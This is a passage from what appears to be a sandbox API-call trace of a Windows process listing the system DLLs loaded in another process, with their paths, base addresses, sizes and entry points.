lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="iphlpapi.dll") returned 0xc [0074.857] CoTaskMemFree (pv=0xd910e0) [0074.857] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.857] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\iphlpapi.dll" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0074.859] CoTaskMemFree (pv=0xd910e0) [0074.859] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x24ec1a0, cb=0x18 | out: lpmodinfo=0x24ec1a0*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0074.860] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.861] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0074.862] CoTaskMemFree (pv=0xd910e0) [0074.862] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.862] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0074.864] CoTaskMemFree (pv=0xd910e0) [0074.864] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x24ee370, cb=0x18 | out: lpmodinfo=0x24ee370*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0074.866] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.866] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0074.868] CoTaskMemFree (pv=0xd910e0) [0074.868] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.868] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0074.869] CoTaskMemFree (pv=0xd910e0) [0074.869] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x24f0540, cb=0x18 | out: lpmodinfo=0x24f0540*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0074.871] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.871] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0074.873] CoTaskMemFree (pv=0xd910e0) [0074.873] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.873] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0074.875] CoTaskMemFree (pv=0xd910e0) [0074.875] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa740000, lpmodinfo=0x24f2710, cb=0x18 | out: lpmodinfo=0x24f2710*(lpBaseOfDll=0x7fefa740000, SizeOfImage=0x20000, EntryPoint=0x7fefa741064)) returned 1 [0074.876] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.876] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa740000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wkssvc.dll") returned 0xa [0074.878] CoTaskMemFree (pv=0xd910e0) [0074.878] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.878] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa740000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll")) returned 0x1e [0074.880] CoTaskMemFree (pv=0xd910e0) [0074.880] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x24f48d0, cb=0x18 | out: lpmodinfo=0x24f48d0*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0074.882] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.882] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0074.884] CoTaskMemFree (pv=0xd910e0) [0074.884] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.884] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0074.886] CoTaskMemFree (pv=0xd910e0) [0074.886] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd180000, lpmodinfo=0x24f6aa0, cb=0x18 | out: lpmodinfo=0x24f6aa0*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0074.888] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.888] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd180000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0074.890] CoTaskMemFree (pv=0xd910e0) [0074.890] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.890] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd180000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0074.892] CoTaskMemFree (pv=0xd910e0) [0074.892] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x24f8c60, cb=0x18 | out: lpmodinfo=0x24f8c60*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0074.894] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.894] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0074.896] CoTaskMemFree (pv=0xd910e0) [0074.896] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.896] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0074.898] CoTaskMemFree (pv=0xd910e0) [0074.898] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa580000, lpmodinfo=0x24fb050, cb=0x18 | out: lpmodinfo=0x24fb050*(lpBaseOfDll=0x7fefa580000, SizeOfImage=0x33000, EntryPoint=0x7fefa58423c)) returned 1 [0074.900] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.900] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa580000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cryptsvc.dll") returned 0xc [0074.902] CoTaskMemFree (pv=0xd910e0) [0074.902] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.902] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa580000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll")) returned 0x20 [0074.905] CoTaskMemFree (pv=0xd910e0) [0074.905] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa550000, lpmodinfo=0x24fd220, cb=0x18 | out: lpmodinfo=0x24fd220*(lpBaseOfDll=0x7fefa550000, SizeOfImage=0x27000, EntryPoint=0x7fefa551098)) returned 1 [0074.907] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.907] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa550000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTNET.dll") returned 0xc [0074.909] CoTaskMemFree (pv=0xd910e0) [0074.909] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.909] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa550000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\CRYPTNET.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")) returned 0x20 [0074.911] CoTaskMemFree (pv=0xd910e0) [0074.911] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x24ff3f0, cb=0x18 | out: lpmodinfo=0x24ff3f0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0074.913] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.913] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0074.917] CoTaskMemFree (pv=0xd910e0) [0074.917] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.917] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0074.919] CoTaskMemFree (pv=0xd910e0) [0074.919] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x25015b0, cb=0x18 | out: lpmodinfo=0x25015b0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0074.921] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.921] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0074.923] CoTaskMemFree (pv=0xd910e0) [0074.923] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.923] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0074.926] CoTaskMemFree (pv=0xd910e0) [0074.926] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x2503770, cb=0x18 | out: lpmodinfo=0x2503770*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0074.928] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.928] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0074.930] CoTaskMemFree (pv=0xd910e0) [0074.931] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.931] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0074.933] CoTaskMemFree (pv=0xd910e0) [0074.933] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa3a0000, lpmodinfo=0x2505930, cb=0x18 | out: lpmodinfo=0x2505930*(lpBaseOfDll=0x7fefa3a0000, SizeOfImage=0x1b0000, EntryPoint=0x7fefa3a1010)) returned 1 [0074.935] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.935] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa3a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VSSAPI.DLL") returned 0xa [0074.938] CoTaskMemFree (pv=0xd910e0) [0074.938] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.938] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa3a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VSSAPI.DLL" (normalized: "c:\\windows\\system32\\vssapi.dll")) returned 0x1e [0074.940] CoTaskMemFree (pv=0xd910e0) [0074.940] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb350000, lpmodinfo=0x2507af0, cb=0x18 | out: lpmodinfo=0x2507af0*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0074.942] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.942] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0074.944] CoTaskMemFree (pv=0xd910e0) [0074.945] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.945] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0074.947] CoTaskMemFree (pv=0xd910e0) [0074.947] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa380000, lpmodinfo=0x2509ca0, cb=0x18 | out: lpmodinfo=0x2509ca0*(lpBaseOfDll=0x7fefa380000, SizeOfImage=0x17000, EntryPoint=0x7fefa381060)) returned 1 [0074.949] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.949] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa380000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VssTrace.DLL") returned 0xc [0074.951] CoTaskMemFree (pv=0xd910e0) [0074.952] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.952] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa380000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VssTrace.DLL" (normalized: "c:\\windows\\system32\\vsstrace.dll")) returned 0x20 [0074.954] CoTaskMemFree (pv=0xd910e0) [0074.954] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x250be70, cb=0x18 | out: lpmodinfo=0x250be70*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0074.956] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.956] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0074.959] CoTaskMemFree (pv=0xd910e0) [0074.959] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.959] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0074.961] CoTaskMemFree (pv=0xd910e0) [0074.961] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb980000, lpmodinfo=0x250e040, cb=0x18 | out: lpmodinfo=0x250e040*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0074.964] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.964] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="samcli.dll") returned 0xa [0074.966] CoTaskMemFree (pv=0xd910e0) [0074.966] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.966] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0074.969] CoTaskMemFree (pv=0xd910e0) [0074.969] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc260000, lpmodinfo=0x2510200, cb=0x18 | out: lpmodinfo=0x2510200*(lpBaseOfDll=0x7fefc260000, SizeOfImage=0x1d000, EntryPoint=0x7fefc261ef4)) returned 1 [0074.971] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SAMLIB.dll") returned 0xa [0074.974] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMLIB.dll" (normalized: "c:\\windows\\system32\\samlib.dll")) returned 0x1e [0074.976] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x25123c0, cb=0x18 | out: lpmodinfo=0x25123c0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0074.979] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0074.981] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0074.984] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2514580, cb=0x18 | out: lpmodinfo=0x2514580*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0074.986] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0074.989] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0074.991] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x2516740, cb=0x18 | out: lpmodinfo=0x2516740*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0074.994] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0074.997] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0074.999] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb2a0000, lpmodinfo=0x2518900, cb=0x18 | out: lpmodinfo=0x2518900*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0075.002] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="es.dll") returned 0x6 [0075.005] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0075.007] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc130000, lpmodinfo=0x251aab0, cb=0x18 | out: lpmodinfo=0x251aab0*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0075.011] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc130000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0075.014] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc130000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0075.016] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa300000, lpmodinfo=0x251cc70, cb=0x18 | out: lpmodinfo=0x251cc70*(lpBaseOfDll=0x7fefa300000, SizeOfImage=0x4e000, EntryPoint=0x7fefa3146e0)) returned 1 [0075.019] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="nlasvc.dll") returned 0xa [0075.022] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll")) returned 0x1e [0075.025] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x251ee30, cb=0x18 | out: lpmodinfo=0x251ee30*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0075.027] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0075.030] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0075.033] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa2c0000, lpmodinfo=0x2520ff0, cb=0x18 | out: lpmodinfo=0x2520ff0*(lpBaseOfDll=0x7fefa2c0000, SizeOfImage=0x38000, EntryPoint=0x7fefa2c363c)) returned 1 [0075.036] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa2c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ncsi.dll") returned 0x8 [0075.040] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa2c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll")) returned 0x1c [0075.042] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa240000, lpmodinfo=0x25231c8, cb=0x18 | out: lpmodinfo=0x25231c8*(lpBaseOfDll=0x7fefa240000, SizeOfImage=0x71000, EntryPoint=0x7fefa241010)) returned 1 [0075.045] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa240000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINHTTP.dll") returned 0xb [0075.048] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa240000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINHTTP.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")) returned 0x1f [0075.051] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa1d0000, lpmodinfo=0x2525388, cb=0x18 | out: lpmodinfo=0x2525388*(lpBaseOfDll=0x7fefa1d0000, SizeOfImage=0x64000, EntryPoint=0x7fefa1d1254)) returned 1 [0075.064] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa1d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="webio.dll") returned 0x9 [0075.068] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa1d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")) returned 0x1d [0075.071] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x2527548, cb=0x18 | out: lpmodinfo=0x2527548*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0075.074] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0075.077] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0075.081] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x2529718, cb=0x18 | out: lpmodinfo=0x2529718*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0075.085] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0075.089] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0075.093] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x252b8d8, cb=0x18 | out: lpmodinfo=0x252b8d8*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0075.096] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0075.099] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0075.102] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa190000, lpmodinfo=0x252da98, cb=0x18 | out: lpmodinfo=0x252da98*(lpBaseOfDll=0x7fefa190000, SizeOfImage=0x11000, EntryPoint=0x7fefa199e7c)) returned 1 [0075.106] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa190000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ssdpapi.dll") returned 0xb [0075.109] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa190000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")) returned 0x1f [0075.112] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x252fc58, cb=0x18 | out: lpmodinfo=0x252fc58*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0075.115] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0075.118] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0075.121] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x2531e18, cb=0x18 | out: lpmodinfo=0x2531e18*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0075.125] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0075.128] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0075.131] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefccb0000, lpmodinfo=0x2533fd8, cb=0x18 | out: lpmodinfo=0x2533fd8*(lpBaseOfDll=0x7fefccb0000, SizeOfImage=0x4c000, EntryPoint=0x7fefccb7950)) returned 1 [0075.134] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefccb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcryptprimitives.dll") returned 0x14 [0075.138] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefccb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")) returned 0x28 [0075.141] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x25361c8, cb=0x18 | out: lpmodinfo=0x25361c8*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0075.144] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, 